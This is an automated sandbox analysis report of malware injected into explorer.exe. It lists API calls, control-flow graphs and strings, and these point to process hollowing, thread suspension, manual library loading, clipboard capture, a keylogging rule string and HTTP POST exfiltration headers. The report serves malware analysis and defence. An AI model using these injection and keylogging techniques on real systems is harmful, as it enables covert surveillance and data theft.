                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A21A834D80327BBEB226739FC89E2B3F59EB457557858464F40592111DA328C32CBB5

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 02792603
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0279260B
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0279261B
                                                                                                                                                                                                              • Thread32First.KERNEL32(00000000,0000001C), ref: 02792629
                                                                                                                                                                                                              • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 02792648
                                                                                                                                                                                                              • SuspendThread.KERNEL32(00000000), ref: 02792658
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02792667
                                                                                                                                                                                                              • Thread32Next.KERNEL32(00000000,0000001C), ref: 02792677
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02792682
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1467098526-0
                                                                                                                                                                                                              • Opcode ID: 9dd48001afdd021a5b226fbae15ac98463856412ddb0154469d97b195c9530d8
                                                                                                                                                                                                              • Instruction ID: 2333a6322047e3626940466d96e369effab30efc63dc8096a6a1d9e3f4ee06ef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9dd48001afdd021a5b226fbae15ac98463856412ddb0154469d97b195c9530d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57117031C45300EFDB01AF64B84CA6FBEB9EF44705F008899F94592540D734892A8BA6

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 295 27920a1-27920fc call 279240f call 2792a09 call 279298a call 27924cc 304 27920fe-2792115 295->304 305 2792117-2792123 295->305 308 2792127-2792129 304->308 305->308 309 27923fd-279240c call 27929eb 308->309 310 279212f-2792166 RtlZeroMemory 308->310 314 279216c-2792187 310->314 315 27923f5-27923fc 310->315 316 27921b9-27921cb 314->316 317 2792189-279219a call 279243d 314->317 315->309 324 27921cf-27921d1 316->324 322 27921ad 317->322 323 279219c-27921ab 317->323 325 27921af-27921b7 322->325 323->325 326 27923e2-27923e8 324->326 327 27921d7-2792233 call 279288d 324->327 325->324 329 27923ea-27923ec call 27929eb 326->329 330 27923f1 326->330 335 2792239-279223e 327->335 336 27923db 327->336 329->330 330->315 337 2792258-2792286 call 2792a09 wsprintfW 335->337 338 2792240-2792251 335->338 336->326 341 2792288-279228a 337->341 342 279229f-27922b6 337->342 338->337 343 279228b-279228e 341->343 347 27922b8-27922ee call 2792a09 wsprintfW 342->347 348 27922f5-279230f 342->348 344 2792299-279229b 343->344 345 2792290-2792295 343->345 344->342 345->343 349 2792297 345->349 347->348 353 27923b8-27923ce call 27929eb 348->353 354 2792315-2792328 348->354 349->342 361 27923d0-27923d2 call 27929eb 353->361 362 27923d7 353->362 354->353 358 279232e-2792344 call 2792a09 354->358 365 2792346-2792351 358->365 361->362 362->336 366 2792353-2792360 call 27929ce 365->366 367 2792365-279237c 365->367 366->367 371 279237e 367->371 372 2792380-279238d 367->372 371->372 372->365 373 279238f-2792393 372->373 374 27923ad-27923b4 call 27929eb 373->374 375 2792395-27923a7 call 27929bd RtlMoveMemory 373->375 374->353 375->374
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02792A09: GetProcessHeap.KERNEL32(00000008,0000A000,027910BF), ref: 02792A0C
                                                                                                                                                                                                                • Part of subcall function 02792A09: RtlAllocateHeap.NTDLL(00000000), ref: 02792A13
                                                                                                                                                                                                                • Part of subcall function 0279298A: lstrlen.KERNEL32(02794FE2,?,00000000,00000000,027920DD,74DE8A60,02794FE2,00000000), ref: 02792992
                                                                                                                                                                                                                • Part of subcall function 0279298A: MultiByteToWideChar.KERNEL32(00000000,00000000,02794FE2,00000001,00000000,00000000), ref: 027929A4
                                                                                                                                                                                                                • Part of subcall function 027924CC: RtlZeroMemory.NTDLL(?,00000018), ref: 027924DE
                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(?,0000003C), ref: 02792139
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 02792272
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 027922DD
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 027923A7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                                                                                                              • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                                                                                                              • API String ID: 4204651544-1701262698
                                                                                                                                                                                                              • Opcode ID: 1e468d6d721af67cb6c3c2bc5949acb1f1861c2efa4f23c5ca1e45f4c4f995c8
                                                                                                                                                                                                              • Instruction ID: bfa683d138390da3dc5d0a5a2a755f58c45cbcd17b72f221f7cc375a789ebf08
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e468d6d721af67cb6c3c2bc5949acb1f1861c2efa4f23c5ca1e45f4c4f995c8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADA17F71648340AFDB11EF69E888A2BBBE9EF89744F00482DF985D7252DB34D905CF52

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 380 27912ae-27912bf 381 27912c5-27912c7 380->381 382 27913a6-27913ad 380->382 381->382 383 27912cd-27912fc call 27929bd lstrlen call 2792a09 381->383 388 279136e-2791377 call 27929eb 383->388 389 27912fe-2791327 call 2792841 RtlZeroMemory 383->389 394 2791379-279137d 388->394 395 279139d-27913a5 call 27929ae 388->395 396 2791329-279134f RtlMoveMemory call 2792569 389->396 397 2791353-2791369 RtlMoveMemory call 2792569 389->397 401 279137f-2791392 call 279255c PathMatchSpecA 394->401 395->382 396->389 405 2791351 396->405 397->388 407 279139b 401->407 408 2791394-2791397 401->408 405->388 407->395 408->401 409 2791399 408->409 409->395
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 027929BD: VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,027912D9,00000000,00000000,?,00000001), ref: 027929C7
                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 027912DC
                                                                                                                                                                                                                • Part of subcall function 02792A09: GetProcessHeap.KERNEL32(00000008,0000A000,027910BF), ref: 02792A0C
                                                                                                                                                                                                                • Part of subcall function 02792A09: RtlAllocateHeap.NTDLL(00000000), ref: 02792A13
                                                                                                                                                                                                              • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0279138A
                                                                                                                                                                                                                • Part of subcall function 02792841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,02791119,00000001), ref: 02792850
                                                                                                                                                                                                                • Part of subcall function 02792841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,02791119,00000001), ref: 02792855
                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(00000000,00000104), ref: 02791316
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02791332
                                                                                                                                                                                                                • Part of subcall function 02792569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,0279136E), ref: 02792591
                                                                                                                                                                                                                • Part of subcall function 02792569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 0279259A
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0279135F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2993730741-0
                                                                                                                                                                                                              • Opcode ID: 967c543d188fc783f00cf20c3f5d358a9ee89ce6e900ae3d8b0220e3c412bc40
                                                                                                                                                                                                              • Instruction ID: 26b07753e100b5717288a6b4b26bfb98bd8d9426b9e74e6c3c5dc2856003e79c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 967c543d188fc783f00cf20c3f5d358a9ee89ce6e900ae3d8b0220e3c412bc40
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA218570B04312AF8F05EE29A45897FB7EAAB84714B50096EFC55D3741DB34DC158A62

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 410 2791581-2791592 412 2791598-279159b 410->412 413 2791624-2791628 410->413 414 279159d-27915a0 412->414 415 27915a7-27915b3 GlobalLock 412->415 414->415 416 27915a2-27915a5 414->416 417 2791623 415->417 418 27915b5-27915b9 415->418 416->413 416->415 417->413 419 27915e9 418->419 420 27915bb-27915be 418->420 421 27915eb-27915f2 call 279293e 419->421 422 27915c0-27915c3 420->422 423 27915e4-27915e7 420->423 426 27915f4-27915fd call 2792724 421->426 425 27915c5-27915e2 lstrlenW call 2792a09 lstrcatW 422->425 422->426 423->421 425->426 432 279161b-2791622 GlobalUnlock 426->432 433 27915ff-2791608 lstrlenW 426->433 432->417 433->432 434 279160a-279160e 433->434 435 279160f call 27916b9 434->435 436 2791614-2791616 call 27929eb 435->436 436->432
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 027915A9
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 027915C6
                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 027915DC
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 02791600
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0279161C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Globallstrlen$LockUnlocklstrcat
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1114890469-0
                                                                                                                                                                                                              • Opcode ID: c8344c88e2e21bf98c58d5f195a296066c1fd933f0ac598c56faec63f1fa89ab
                                                                                                                                                                                                              • Instruction ID: 146f69cd0e49b004d41702b60f7598767b7e665e5c67a962d2ad58328ef02812
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8344c88e2e21bf98c58d5f195a296066c1fd933f0ac598c56faec63f1fa89ab
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69010832E403236B9E26767D785C67E62AFDFC621474A8425E80FE3201DF358C238651
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(?,?,?), ref: 02791BF4
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,02795848,00000000,00000000,74DF2EE0,00000000,027919B6,?,?,?,00000001,?,00000000), ref: 02791C1C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000002), ref: 02791C49
                                                                                                                                                                                                              • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 02791C9A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3827878703-0
                                                                                                                                                                                                              • Opcode ID: 3075c68f21945d0306550bc6aad57ea4919d2d7c6794133134ed0d25785dd073
                                                                                                                                                                                                              • Instruction ID: 7718d82b2ec23f2db7cc7233b65eb5bba2fd4be97e1c02008eed409b31425065
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3075c68f21945d0306550bc6aad57ea4919d2d7c6794133134ed0d25785dd073
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9318371701717AFCF18CF29E884B66B7A8BF06319F44456DE84AC7640D731E865DBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlEnterCriticalSection.NTDLL(0279582C), ref: 02791839
                                                                                                                                                                                                              • lstrlenW.KERNEL32 ref: 02791845
                                                                                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(0279582C), ref: 027918A9
                                                                                                                                                                                                              • Sleep.KERNEL32(00007530), ref: 027918B4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2134730579-0
                                                                                                                                                                                                              • Opcode ID: 0f32c275c168388774a189bf71c3ab67b365d99259893df277342b34f01d5db8
                                                                                                                                                                                                              • Instruction ID: 278a77e1164468569d8dd3a6d14ba7c09aae46a0e032588c195a5ff3c78a54cc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f32c275c168388774a189bf71c3ab67b365d99259893df277342b34f01d5db8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE01A230D50310BBDB16B7B9FC5D92E3AAAEB417503408428E80697241EA308C23DFA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,027911DD), ref: 027926DB
                                                                                                                                                                                                              • IsWow64Process.KERNEL32(000000FF,?), ref: 027926ED
                                                                                                                                                                                                              • IsWow64Process.KERNEL32(00000000,?), ref: 02792700
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02792716
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 331459951-0
                                                                                                                                                                                                              • Opcode ID: 51548a96f800b365aa013d19a3a9664be6dc73845988b0b14f2a1ec51b91ebbb
                                                                                                                                                                                                              • Instruction ID: 8305e0385eaa2dcc2889af84d5cd0544286184acccc3173b4f681fd4ea1e3f09
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51548a96f800b365aa013d19a3a9664be6dc73845988b0b14f2a1ec51b91ebbb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00F09075D42319FF9B10DFA4AD888BFB7BDEE05255B1042AAEA05A3241D7314E0196A0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02792A09: GetProcessHeap.KERNEL32(00000008,0000A000,027910BF), ref: 02792A0C
                                                                                                                                                                                                                • Part of subcall function 02792A09: RtlAllocateHeap.NTDLL(00000000), ref: 02792A13
                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,00000000), ref: 027917F3
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0279181D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 02791817
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                                                                                                                                                              • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                                                                                                                                                                                              • API String ID: 377395780-613334611
                                                                                                                                                                                                              • Opcode ID: f96e4a1b1f37344a0cc7ff50dcf95f6662d9e48fa8d5c998eadf483e5bddbf62
                                                                                                                                                                                                              • Instruction ID: 7fe0e0117a331ac895530d53956c97a847fb6efa1d92538cf193d6948c05f606
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f96e4a1b1f37344a0cc7ff50dcf95f6662d9e48fa8d5c998eadf483e5bddbf62
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AF03772D40128BA9B1467DDAC058FFB3FCEB0D701B00058AFE55D1140E5785950D7B5

                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                              • Disassembly available
                                                                                                                                                                                                              callgraph 0 Function_00143394 7 Function_00141E9C 0->7 24 Function_00141A88 0->24 35 Function_00141838 0->35 49 Function_001418D0 0->49 69 Function_00141EF8 0->69 74 Function_00141860 0->74 81 Function_001418E8 0->81 1 Function_00142D14 6 Function_00141E1C 1->6 33 Function_001424B8 1->33 1->35 1->74 1->81 2 Function_00144817 3 Function_00141B10 4 Function_0014B291 5 Function_0014AB9C 6->35 8 Function_0014141D 9 Function_00142918 10 Function_00142A04 10->9 57 Function_001427C4 10->57 78 Function_00141C6C 10->78 11 Function_00141D04 12 Function_00141405 13 Function_0014B007 14 Function_0014AD00 15 Function_00142580 16 Function_00141F00 17 Function_00141000 18 Function_0014A881 19 Function_00144203 20 Function_00141F0C 21 Function_0014188C 21->35 22 Function_0014370C 22->22 22->35 42 Function_001431AC 22->42 56 Function_001434C4 22->56 22->78 23 Function_0014AC8D 25 Function_00141508 26 Function_00145289 27 Function_0014AAB0 28 Function_001414B2 29 Function_00144233 30 Function_001419BC 31 Function_00142FBC 41 Function_00142E2C 31->41 32 Function_0014B2BE 43 Function_0014B4A8 32->43 33->35 63 Function_001420F4 33->63 33->74 34 Function_00141938 34->35 34->74 36 Function_00141D24 37 Function_001427A0 38 Function_00141822 39 Function_00141CAC 40 Function_001420AC 40->24 41->21 58 Function_00142DC0 41->58 41->74 42->3 42->35 44 Function_001425A8 42->44 47 Function_00141D54 42->47 68 Function_001426F8 42->68 42->74 85 Function_0014B46A 43->85 44->15 44->49 80 Function_00142768 44->80 45 Function_00141254 46 Function_001414D4 48 Function_0014ABD7 50 Function_0014AAD2 51 Function_00141FDC 51->35 67 Function_001418F8 51->67 52 Function_0014B2DF 53 Function_0014B358 53->43 54 Function_00143158 55 Function_0014B15B 56->0 56->10 56->11 56->24 56->30 56->35 56->36 56->39 59 Function_00141C4C 56->59 66 Function_00141BF8 56->66 56->74 56->78 58->35 60 Function_0014ABCF 61 Function_0014B148 62 Function_00144048 63->20 63->21 63->30 63->35 63->40 63->49 63->51 63->67 63->74 64 Function_0014AFF6 65 Function_00141576 68->15 73 Function_00142664 68->73 68->78 70 Function_001414F9 71 Function_00145579 72 Function_00141EFA 74->78 75 Function_00141560 76 Function_0014AFE3 77 Function_0014156C 79 Function_0014A8E8 80->37 82 Function_00143068 82->34 82->35 82->41 82->74 82->78 83 Function_0014C0E9 84 Function_0014ADEA

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 113 14370c-14371c call 141c6c 116 1437b0-1437b5 113->116 117 143722-143754 call 141838 113->117 121 143785-1437aa NtUnmapViewOfSection 117->121 122 143756-14375b call 141838 117->122 126 1437bc-1437cb call 1434c4 121->126 127 1437ac-1437ae 121->127 125 143760-143779 122->125 125->121 133 1437d5-1437de 126->133 134 1437cd-1437d0 call 14370c 126->134 127->116 128 1437b6-1437bb call 1431ac 127->128 128->126 134->133
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL ref: 0014378C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001C.00000002.2893008511.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_141000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: SectionUnmapView
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 498011366-0
                                                                                                                                                                                                              • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                                                                                                                              • Instruction ID: cd77c0423d845ba0c6dfe39b12f03788303bf9194c0ff9b13a7dd12c67190a05
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E611C8746019094FFB5CFB78989D37537E1F754312F544029E865C72B2DF398A818700

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00141BF8: OpenFileMappingA.KERNEL32 ref: 00141C0F
                                                                                                                                                                                                                • Part of subcall function 00141BF8: MapViewOfFile.KERNELBASE ref: 00141C2E
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 001435B7
                                                                                                                                                                                                              • Process32First.KERNEL32 ref: 001435DA
                                                                                                                                                                                                              • CharLowerA.USER32 ref: 001435EE
                                                                                                                                                                                                              • Process32Next.KERNEL32 ref: 001436CD
                                                                                                                                                                                                              • CloseHandle.KERNELBASE ref: 001436DE
                                                                                                                                                                                                              • SysFreeMap.PGOCR ref: 001436F7
                                                                                                                                                                                                              • SleepEx.KERNELBASE ref: 00143701
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001C.00000002.2893008511.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_141000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileProcess32$CharCloseCreateFirstFreeHandleLowerMappingNextOpenSleepSnapshotToolhelp32View
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2386764625-0
                                                                                                                                                                                                              • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                                                                                                                              • Instruction ID: 124acde2ded130d6ec2cd99066f89f2fed6d7d0fb9f75a883a94ce77bbbe54fb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3051BB30208A095FDB19FF28D8996AA73E2FBA4310F444619E45BC72B1DF38DA458B81

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 54 14b4a8-14b4ab 55 14b4b5-14b4b9 54->55 56 14b4c5 55->56 57 14b4bb-14b4c3 55->57 58 14b4c7 56->58 59 14b4ad-14b4b3 56->59 57->56 60 14b4ca-14b4d1 58->60 59->55 62 14b4d3-14b4db 60->62 63 14b4dd 60->63 62->63 63->60 64 14b4df-14b4e2 63->64 65 14b4e4-14b4f2 64->65 66 14b4f7-14b504 64->66 67 14b4f4-14b4f5 65->67 68 14b52e-14b549 65->68 76 14b506-14b508 66->76 77 14b51e-14b52c call 14b46a 66->77 67->66 69 14b57a-14b57d 68->69 71 14b582-14b589 69->71 72 14b57f-14b580 69->72 75 14b58f-14b593 71->75 74 14b561-14b565 72->74 78 14b567-14b56a 74->78 79 14b54b-14b54e 74->79 80 14b595-14b5ae LoadLibraryA 75->80 81 14b5f0-14b5f9 75->81 82 14b50b-14b512 76->82 77->55 78->71 83 14b56c-14b570 78->83 79->71 87 14b550 79->87 86 14b5af-14b5b6 80->86 84 14b5fc-14b605 81->84 101 14b514-14b51a 82->101 102 14b51c 82->102 88 14b551-14b555 83->88 89 14b572-14b579 83->89 90 14b607-14b609 84->90 91 14b62a-14b67a VirtualProtect * 2 84->91 86->75 93 14b5b8 86->93 87->88 88->74 100 14b557-14b559 88->100 89->69 95 14b61c-14b628 90->95 96 14b60b-14b61a 90->96 97 14b67e-14b683 91->97 98 14b5c4-14b5cc 93->98 99 14b5ba-14b5c2 93->99 95->96 96->84 97->97 103 14b685-14b694 97->103 104 14b5ce-14b5da 98->104 99->104 100->74 105 14b55b-14b55f 100->105 101->102 102->77 102->82 108 14b5e5-14b5ef 104->108 109 14b5dc-14b5e3 104->109 105->74 105->78 109->86
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 0014B5A7
                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0014B651
                                                                                                                                                                                                              • VirtualProtect.KERNELBASE ref: 0014B66F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001C.00000002.2893008511.000000000014A000.00000040.80000000.00040000.00000000.sdmp, Offset: 0014A000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_14a000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 895956442-0
                                                                                                                                                                                                              • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                                                                                                                              • Instruction ID: a3019437ddd2afdf30cc8f6b63055c4eff59b6a7e4ed697b20ca4ee5e3b903b7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A518C3275C91D4BCB28AB7C9CD43F4F7D1F759325B180A3AC49ACB2A5E758C8468381

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 110 141bf8-141c18 OpenFileMappingA 111 141c1a-141c38 MapViewOfFile 110->111 112 141c3b-141c48 110->112 111->112
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001C.00000002.2893008511.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_141000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$MappingOpenView
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3439327939-0
                                                                                                                                                                                                              • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                                                                                                                              • Instruction ID: f2945bcfd8831df92672e8549c06640a78e8b090393f57e1a130ce6ab3c17ea8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21F01234314F4D4FAB45EF7C9CDC135B7E1EBA8202744857A985AC6165EF34C8858715
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001D.00000002.2340689462.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
